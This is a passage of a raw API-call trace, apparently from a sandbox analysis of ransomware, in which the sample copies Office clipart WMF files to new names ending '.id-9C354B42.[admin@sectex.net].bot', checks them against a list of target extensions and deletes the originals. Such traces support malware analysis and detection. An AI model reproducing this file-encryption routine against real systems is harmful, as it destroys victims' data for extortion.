	[0160.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.753] lstrlenW (lpString=".dbf") returned 4
	[0160.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.753] lstrlenW (lpString=".1cd") returned 4
	[0160.753] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.753] lstrlenW (lpString=".jpg") returned 4
	[0160.753] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.754] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.754] lstrlenW (lpString="J0107254.WMF") returned 12
	[0160.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.754] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=20212) returned 1
	[0160.754] CloseHandle (hObject=0x388) returned 1
	[0160.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf")) returned 0x20
	[0160.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.755] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.755] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0160.756] GetLastError () returned 0x0
	[0160.756] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4ef4, lpOverlapped=0x0) returned 1
	[0160.767] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4f00, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4f00, lpOverlapped=0x0) returned 1
	[0160.768] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.768] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.769] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.769] CloseHandle (hObject=0x1b4) returned 1
	[0160.769] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.769] SetEndOfFile (hFile=0x388) returned 1
	[0160.771] CloseHandle (hObject=0x388) returned 1
	[0160.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.772] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf")) returned 1
	[0160.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.772] lstrlenW (lpString=".doc") returned 4
	[0160.772] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.772] lstrlenW (lpString=".docx") returned 5
	[0160.772] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0160.772] lstrlenW (lpString=".pdf") returned 4
	[0160.772] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.772] lstrlenW (lpString=".xls") returned 4
	[0160.772] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.772] lstrlenW (lpString=".xlsx") returned 5
	[0160.773] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0160.773] lstrlenW (lpString=".ppt") returned 4
	[0160.773] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.773] lstrlenW (lpString=".zip") returned 4
	[0160.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.773] lstrlenW (lpString=".rar") returned 4
	[0160.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString=".bz2") returned 4
	[0160.773] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString=".7z") returned 3
	[0160.773] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.773] lstrlenW (lpString=".dbf") returned 4
	[0160.773] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.773] lstrlenW (lpString=".1cd") returned 4
	[0160.773] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.773] lstrlenW (lpString=".jpg") returned 4
	[0160.773] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.773] lstrlenW (lpString=".doc") returned 4
	[0160.773] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString=".docx") returned 5
	[0160.773] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0160.773] lstrlenW (lpString=".pdf") returned 4
	[0160.773] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.773] lstrlenW (lpString=".xls") returned 4
	[0160.773] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.774] lstrlenW (lpString=".xlsx") returned 5
	[0160.774] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0160.774] lstrlenW (lpString=".ppt") returned 4
	[0160.774] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.774] lstrlenW (lpString=".zip") returned 4
	[0160.774] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.774] lstrlenW (lpString=".rar") returned 4
	[0160.774] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.774] lstrlenW (lpString=".bz2") returned 4
	[0160.774] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.774] lstrlenW (lpString=".7z") returned 3
	[0160.774] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.774] lstrlenW (lpString=".dbf") returned 4
	[0160.774] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.774] lstrlenW (lpString=".1cd") returned 4
	[0160.774] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 63
	[0160.774] lstrlenW (lpString=".jpg") returned 4
	[0160.774] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.774] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.774] lstrlenW (lpString="J0107258.WMF") returned 12
	[0160.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.117] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8552) returned 1
	[0161.127] CloseHandle (hObject=0x3b8) returned 1
	[0161.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf")) returned 0x20
	[0161.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.150] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.163] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.173] GetLastError () returned 0x0
	[0161.173] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2168, lpOverlapped=0x0) returned 1
	[0161.175] WriteFile (in: hFile=0x3f0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2170, lpOverlapped=0x0) returned 1
	[0161.176] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.176] WriteFile (in: hFile=0x3f0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.176] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.176] CloseHandle (hObject=0x3f0) returned 1
	[0161.176] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.176] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.178] CloseHandle (hObject=0x3b8) returned 1
	[0161.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf")) returned 1
	[0161.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.179] lstrlenW (lpString=".doc") returned 4
	[0161.179] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.179] lstrlenW (lpString=".docx") returned 5
	[0161.179] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.179] lstrlenW (lpString=".pdf") returned 4
	[0161.179] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.179] lstrlenW (lpString=".xls") returned 4
	[0161.179] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.179] lstrlenW (lpString=".xlsx") returned 5
	[0161.179] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.179] lstrlenW (lpString=".ppt") returned 4
	[0161.180] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.180] lstrlenW (lpString=".zip") returned 4
	[0161.180] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.180] lstrlenW (lpString=".rar") returned 4
	[0161.180] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString=".bz2") returned 4
	[0161.180] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString=".7z") returned 3
	[0161.180] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.180] lstrlenW (lpString=".dbf") returned 4
	[0161.180] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.180] lstrlenW (lpString=".1cd") returned 4
	[0161.180] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.180] lstrlenW (lpString=".jpg") returned 4
	[0161.180] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.180] lstrlenW (lpString=".doc") returned 4
	[0161.180] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString=".docx") returned 5
	[0161.180] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.180] lstrlenW (lpString=".pdf") returned 4
	[0161.180] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.180] lstrlenW (lpString=".xls") returned 4
	[0161.180] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.180] lstrlenW (lpString=".xlsx") returned 5
	[0161.180] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.181] lstrlenW (lpString=".ppt") returned 4
	[0161.181] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.181] lstrlenW (lpString=".zip") returned 4
	[0161.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.181] lstrlenW (lpString=".rar") returned 4
	[0161.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.181] lstrlenW (lpString=".bz2") returned 4
	[0161.181] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.181] lstrlenW (lpString=".7z") returned 3
	[0161.181] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.181] lstrlenW (lpString=".dbf") returned 4
	[0161.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.181] lstrlenW (lpString=".1cd") returned 4
	[0161.181] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 63
	[0161.181] lstrlenW (lpString=".jpg") returned 4
	[0161.181] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.181] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.181] lstrlenW (lpString="J0107342.WMF") returned 12
	[0161.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.511] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4244) returned 1
	[0161.511] CloseHandle (hObject=0x1d8) returned 1
	[0161.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf")) returned 0x20
	[0161.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.519] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.519] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.519] GetLastError () returned 0x0
	[0161.519] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1094, lpOverlapped=0x0) returned 1
	[0161.544] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x10a0, lpOverlapped=0x0) returned 1
	[0161.545] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.545] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.545] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.546] CloseHandle (hObject=0x3d0) returned 1
	[0161.546] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.546] SetEndOfFile (hFile=0x388) returned 1
	[0161.548] CloseHandle (hObject=0x388) returned 1
	[0161.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf")) returned 1
	[0161.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.574] lstrlenW (lpString=".doc") returned 4
	[0161.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString=".docx") returned 5
	[0161.575] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.575] lstrlenW (lpString=".pdf") returned 4
	[0161.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString=".xls") returned 4
	[0161.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.575] lstrlenW (lpString=".xlsx") returned 5
	[0161.575] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.575] lstrlenW (lpString=".ppt") returned 4
	[0161.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.575] lstrlenW (lpString=".zip") returned 4
	[0161.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.575] lstrlenW (lpString=".rar") returned 4
	[0161.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString=".bz2") returned 4
	[0161.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString=".7z") returned 3
	[0161.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.575] lstrlenW (lpString=".dbf") returned 4
	[0161.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.575] lstrlenW (lpString=".1cd") returned 4
	[0161.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.575] lstrlenW (lpString=".jpg") returned 4
	[0161.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.575] lstrlenW (lpString=".doc") returned 4
	[0161.575] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.576] lstrlenW (lpString=".docx") returned 5
	[0161.576] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.576] lstrlenW (lpString=".pdf") returned 4
	[0161.576] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.576] lstrlenW (lpString=".xls") returned 4
	[0161.576] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.576] lstrlenW (lpString=".xlsx") returned 5
	[0161.576] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.576] lstrlenW (lpString=".ppt") returned 4
	[0161.576] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.576] lstrlenW (lpString=".zip") returned 4
	[0161.576] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.576] lstrlenW (lpString=".rar") returned 4
	[0161.576] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.576] lstrlenW (lpString=".bz2") returned 4
	[0161.576] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.576] lstrlenW (lpString=".7z") returned 3
	[0161.576] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.576] lstrlenW (lpString=".dbf") returned 4
	[0161.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.576] lstrlenW (lpString=".1cd") returned 4
	[0161.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
